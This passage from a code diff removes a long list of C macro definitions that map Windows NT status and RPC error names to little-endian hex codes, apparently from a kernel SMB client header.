+-#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
+-#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
+-#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
+-#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
+-#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
+-#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
+-#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
+-#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
+-#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
+-#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
+-#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
+-#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
+-#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
+-#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
+-#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
+-#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
+-#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
+-#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
+-#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
+-#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
+-#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
+-#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
+-#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
+-#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
+-#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
+-#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
+-#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
+-#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
+-#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
+-#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
+-#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
+-#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
+-#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
+-#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
+-#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
+-#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
+-#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
+-#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
+-#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED	\
+-	cpu_to_le32(0xC000A080)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR	\
+-	cpu_to_le32(0xC000A081)
+-#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
+-#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
+-#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
+-#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
+-#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
+-#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
+-#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
+-#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
+-#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
+-#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
+-#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
+-#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
+-#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
+-#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
+-#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
+-#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
+-#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
+-#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
+-#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
+-#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
+-#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
+-#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
+-#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
+-#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
+-#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
+-#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
+-#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
+-#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
+-#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
+-#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
+-#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
+-#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
+-#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
+-#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
+-#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
+-#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
+-#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
+-#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
+-#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
+-#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
+-#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
+-#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
+-#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
+-#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
+-#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
+-#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
+-#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
+-#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
+-#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
+-#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
+-#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
+-#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
+-#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
+-#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
+-#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
+-#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
+-#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
+-#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
+-#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
+-#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
+-#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
+-#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
+-#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
+-#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
+-#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
+-#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
+-#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
+-#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
+-#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
+-#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
+-#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
+-#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
+-#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
+-#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
+-#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
+-#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
+-#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
+-#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
+-#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
+-#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
+-#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
+-#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
+-#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
+-#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
+-#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
+-#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
+-#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
+-#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
+-#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
+-#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
+-#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
+-#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
+-#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
+-#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
+-#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
+-#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
+-#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
+-#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
+-#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
+-#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
+-#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
+-#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
+-#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
+-#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
+-#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
+-#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
+-#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
+-#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
+-#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
+-#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
+-#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
+-#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
+-#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
+-#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
+-#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
+-#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
+-#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
+-#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
+-#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
+-#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
+-#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
+-#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
+-#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
+-#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
+-#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
+-#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
+-#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
+-#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
+-#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
+-#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
+-#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
+-#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
+-#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
+-#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
+-#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
+-#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
+-#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
+-#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
+-#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
+-#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
+-#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
+-#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
+-#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
+-#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
+-#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
+-#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
+-#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
+-#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
+-#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
+-#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
+-#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
+-#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
+-#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
+-#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
+-#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
+-#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
+-#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
+-#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
+-#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
+-#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
+-#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
+-#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
+-#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
+-#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
+-#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
+-#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
+-#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
+-#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
+-#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
+-#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
+-#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
+-#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
+-#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
+-#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
+-#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
+-#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
+-#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
+-#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
+-#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
+-#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
+-#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
+-#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
+-#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
+-#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
+-#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
+-#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
+-#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
+-#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
+-#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
+-#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
+-#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
+-#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
+-#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
+-#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
+-#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
+-#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
+-#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
+-#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
+-#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
+-#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
+-#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
+-#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
+-#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
+-#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
+-#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
+-#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
+-#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
+-#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
+-#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
+-#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
+-#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
+-#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
+-#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
+-#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
+-#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
+-#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
+-#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
+-#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
+-#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
+-#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
+-#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
+-#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
+-#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
+-#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
+-#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
+-#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
+-#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
+-#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
+-#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
+-#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
+-#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY	\
+-	cpu_to_le32(0xC0150012)
+-#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
+-#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
+-#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
+-#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
+-#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
+-#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
+-#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
+-#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT	\
+-	cpu_to_le32(0xC015001C)
+-#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
+-#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
+-#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
+-#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
+-#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
+-#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
+-#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
+-#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
+-#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
+-#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
+-#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
+-#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
+-#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
+-#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
+-#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
+-#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
+-#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
+-#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
+-#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
+-#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
+-#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
+-#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
+-#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
+-#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
+-#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
+-#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
+-#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
+-#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
+-#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
+-#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
+-#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
+-#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
+-#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
+-#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
+-#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
+-#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
+-#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION	\
+-	cpu_to_le32(0xC0190024)
+-#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
+-#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
+-#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
+-#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
+-#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
+-#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
+-#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
+-#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
+-#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
+-#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
+-#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
+-#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
+-#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
+-#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
+-#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
+-#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
+-#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
+-#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
+-#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
